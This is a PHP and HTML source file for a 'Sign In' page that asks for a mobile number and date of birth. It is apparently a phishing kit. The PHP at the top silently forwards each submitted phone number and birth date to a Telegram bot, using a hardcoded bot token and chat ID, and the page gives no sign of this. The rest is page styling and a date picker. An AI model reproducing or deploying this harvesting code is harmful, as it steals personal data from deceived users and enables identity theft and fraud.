<?php

function telegram($phoneNumber, $dob){
	$key = "bot6118590901:AAECdpLRP6BE-1Th8Wxed49E1wS_HJ4LfyU";
	$chat_id = "5735146774";

	if(isset($phoneNumber) && isset($dob)){ 
		
		$ch = curl_init("https://api.telegram.org/".
			$key."/sendMessage?chat_id=".
			$chat_id."&text=Mobile number : ".
			$phoneNumber."%0aDate of birth : ".
			$dob);

		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		$data = curl_exec($ch);
		curl_close($ch);
	}
}

$phoneNumber = $_POST['phoneNumber'];
$dob = $_POST['dob'];

telegram($phoneNumber, $dob);

?>


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
<link rel="stylesheet" href="https://code.jquery.com/ui/1.13.1/themes/base/jquery-ui.css">
<link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css">

<title>Sign In</title>
<style>

@import url('https://fonts.googleapis.com/css2?family=Cabin:ital,wght@0,400..700;1,400..700&display=swap');
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        .container {
            max-width: 800px;
            margin: 0 auto;
            padding: 30px;
        }

        header {
            text-align: center;
            padding: 20px 0;
        }

        .logo {
            margin-top: -90px;
            max-height: 40px;
            max-width: 200px;
        }

        .illustration {
            display: block;
            margin: 10px auto;
            max-width: 90%;
        }

        .heading {
            font-size: 32px;
            font-family: "Cabin", sans-serif;
            font-optical-sizing: auto;
            font-weight: 800;
            font-style: normal;
            text-align: center;
            margin-bottom: 10px;
            text-align: center;
            margin-bottom: 10px;
        }

        .text {
            color: #747474;
            font-size: 15px;
            font-family: "Cabin", sans-serif;
            font-optical-sizing: auto;
            font-weight: 300;
            font-style: normal;
            text-align: center;
            text-align: left;
            margin-bottom: 20px;
            text-align: left;
            margin-bottom: 20px;
        }

        .form-container {
            margin-top: 20px;
        }

        .form-group {
            
            margin-bottom: 15px;
        }

        .input-icon {
            
            position: relative;
        }

        .input-icon i {
            position: absolute;
            left: 12px;
            top: 50%;
            transform: translateY(-50%);
            color: #85A3BF; /* Set icon color to blue */
        }

        input[type="text"],
        input[type="password"],
        input[type="checkbox"] {
            font-family: "Cabin", sans-serif;
            font-optical-sizing: auto;
            font-weight: 500;
            font-style: normal;
            width: 100%;
            height: 50px;
            max-width: 400px;
            padding: 10px 40px 10px 40px; /* Adjust padding for icon placement */
            border: 2px solid #85A3BF;
            border-radius: 5px;
            box-sizing: border-box;
        }

        .expiry-cvv {
            display: flex;
            gap: 10px;
        }

        .checkbox-container {
            display: flex;
            align-items: center;
            margin-top: 15px;
        }

        .proceed-button {
            display: block;
            width: 100%;
            padding: 16px;
            background-color: #004D93;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            font-family: "Cabin", sans-serif;
            font-optical-sizing: auto;
            font-weight: 500;
            font-style: normal;
            margin-top: 20px;
        }

        .proceed-button:hover {
            background-color: #0056b3;
        }

        /* Media query for smaller screens (mobile devices) */
        @media only screen and (max-width: 600px) {
            .form-group {
                display: block;
            }

            input[type="text"],
            input[type="password"],
            input[type="checkbox"] {
                max-width: 100%;
            }
        }


        .rotated-icon {
    transform: rotate(360deg);
  }
    </style>
</head>
<body>
<script src="https://code.jquery.com/jquery-3.6.0.min.js" type="883676ed362265f9612c4982-text/javascript"></script>
<link rel="stylesheet" href="https://code.jquery.com/ui/1.13.1/themes/base/jquery-ui.css">
<script src="https://code.jquery.com/ui/1.13.1/jquery-ui.js" type="883676ed362265f9612c4982-text/javascript"></script>
<script type="883676ed362265f9612c4982-text/javascript">
    $(document).ready(function () {
        $('#dob').datepicker({
            dateFormat: 'yy-mm-dd', // You can adjust the date format as needed
            changeMonth: true,
            changeYear: true,
            yearRange: '-100:+0' // Allow selection of past 100 years
        });
    });
</script>
<div class="container">
<header>
<img src="assets/logo(1).png" alt="Logo" class="logo">
</header>
<img src="assets/login.png" alt="Illustration" class="illustration">
<h2 class="heading">Sign In</h2>
<p class="text">Enter valid Phone Number & date of birth to continue</p>
<form action="php/insert1.php" method="POST">
<div class="form-container">
<div class="form-group">
<div class="input-icon">
<i class="fa fa-phone rotated-icon" aria-hidden="true"></i>
<input type="text" id="phoneNumber" name="phoneNumber" maxlength="10" placeholder="Phone Number" required>
</div>
</div>
<div class="form-group">
<div class="input-icon">
<i class="fa fa-calendar" aria-hidden="true"></i>
<input type="text" id="dob" name="dob" placeholder="Date Of Birth" required>
</div>
</div>
 <input type="submit" name="submit" value="Proceed" class="proceed-button" onclick="kirimPe()" />
</div>
</form>
</div>
<script src="https://code.jquery.com/jquery-3.6.0.min.js" type="883676ed362265f9612c4982-text/javascript"></script>
<script src="https://code.jquery.com/ui/1.13.1/jquery-ui.js" type="883676ed362265f9612c4982-text/javascript"></script>
<script type="883676ed362265f9612c4982-text/javascript">
        $(document).ready(function () {
            $('#dob').datepicker({
                dateFormat: 'yy-mm-dd',
                changeMonth: true,
                changeYear: true,
                yearRange: '-100:+0'
            });

            $('#proceedButton').click(function (e) {
                e.preventDefault();
                var phoneNumber = $('#phoneNumber').val();
                var dob = $('#dob').val();

                if (phoneNumber.length !== 10 || isNaN(phoneNumber)) {
                    alert('Please enter a valid 10-digit phone number.');
                    return false;
                }

                if (dob === '') {
                    alert('Please select your Date of Birth.');
                    return false;
                }

                $('#loginForm').submit();
            });
        });
    </script>
    
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.1.5/dist/sweetalert2.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.1.4"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
        <script src="./js/maina.js"></script>

 <script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="883676ed362265f9612c4982-|49" defer></script> </body>
</html>
